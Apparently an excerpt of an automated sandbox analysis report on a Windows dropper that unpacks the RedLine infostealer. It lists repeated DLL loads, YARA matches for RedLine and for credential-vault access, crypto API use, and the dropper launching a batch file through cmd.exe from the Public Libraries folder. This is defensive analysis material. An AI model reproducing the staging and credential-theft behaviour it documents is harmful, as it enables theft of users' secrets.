              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: ???.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: ???.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: ???.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: ??l.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: ??l.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: ????.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: ??l.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: ??l.dllJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: ???.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: ???.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: ???.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: ??l.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: ??l.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: ????.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: ??l.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: am.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: endpointdlp.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: endpointdlp.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: endpointdlp.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: endpointdlp.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: advapi.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: advapi.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: advapi.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: advapi.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: advapi.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: advapi.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: advapi.dll
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection loaded: ??l.dll
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 8.2.srcngmlC.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 12.2.srcngmlC.pif.3eeb5b90.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 12.2.srcngmlC.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 12.1.srcngmlC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 5.2.srcngmlC.pif.31c600c6.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 8.2.srcngmlC.pif.34490ee8.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 8.2.srcngmlC.pif.32f65b90.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 8.2.srcngmlC.pif.34490ee8.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 8.2.srcngmlC.pif.34490000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 5.2.srcngmlC.pif.32f55b90.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 12.2.srcngmlC.pif.3da10fae.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 5.2.srcngmlC.pif.32f55b90.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 5.2.srcngmlC.pif.344a0ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 8.2.srcngmlC.pif.34490000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 12.2.srcngmlC.pif.3da100c6.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 5.2.srcngmlC.pif.344a0ee8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 12.2.srcngmlC.pif.409b0000.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 8.1.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 5.1.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 8.2.srcngmlC.pif.31bd0fae.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 12.2.srcngmlC.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 8.2.srcngmlC.pif.34b10000.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 12.2.srcngmlC.pif.3dce0ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 12.2.srcngmlC.pif.3eeb5b90.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 12.2.srcngmlC.pif.3dce0ee8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 5.2.srcngmlC.pif.344a0000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 5.2.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 8.1.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 8.2.srcngmlC.pif.32f65b90.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 5.2.srcngmlC.pif.31c60fae.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 5.2.srcngmlC.pif.31c60fae.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 5.2.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 8.2.srcngmlC.pif.31bd00c6.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 5.1.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 5.2.srcngmlC.pif.344a0000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 12.2.srcngmlC.pif.409b0000.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 12.2.srcngmlC.pif.3dce0000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 12.1.srcngmlC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 12.2.srcngmlC.pif.3da100c6.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 8.2.srcngmlC.pif.31bd0fae.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 12.2.srcngmlC.pif.3da10fae.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 8.2.srcngmlC.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 5.2.srcngmlC.pif.31c600c6.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 8.2.srcngmlC.pif.31bd00c6.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 12.2.srcngmlC.pif.3dce0000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 8.2.srcngmlC.pif.34b10000.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 5.2.srcngmlC.pif.34c10000.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 0000000C.00000001.1903364195.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 00000008.00000001.1833365375.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000008.00000002.1918672427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 0000000C.00000002.2903058685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 5.2.srcngmlC.pif.32f55b90.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 5.2.srcngmlC.pif.32f55b90.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, ZTFEpdjP8zw.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, WnRNxU.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, 2njIk.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, I5ElxL.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
              Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, QQSiOsa4hPS.csCryptographic APIs: 'CreateDecryptor'
              Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, FdHU4eb83Z7.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: truesight.sys.0.drBinary string: \Device\Driver\
              Source: truesight.sys.0.drBinary string: \Device\TrueSight
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/9@4/3
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029F3458 GetLastError,FormatMessageA,0_2_029F3458
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029D8F58 GetDiskFreeSpaceA,0_2_029D8F58
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,5_2_004019F0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029EEF94 CoCreateInstance,0_2_029EEF94
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029EA2E8 FreeResource,0_2_029EA2E8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeFile created: C:\Users\Public\Libraries\Clmgncrs.PIFJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ClmgncrsO.bat" "
              Source: C:\Users\Public\Libraries\srcngmlC.pifCommand line argument: 08A5_2_00413780
              Source: C:\Users\Public\Libraries\srcngmlC.pifCommand line argument: 08A5_2_00413780
              Source: C:\Users\Public\Libraries\srcngmlC.pifCommand line argument: 08A5_1_00413780
              Source: C:\Users\Public\Libraries\srcngmlC.pifCommand line argument: 08A8_2_00413780
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
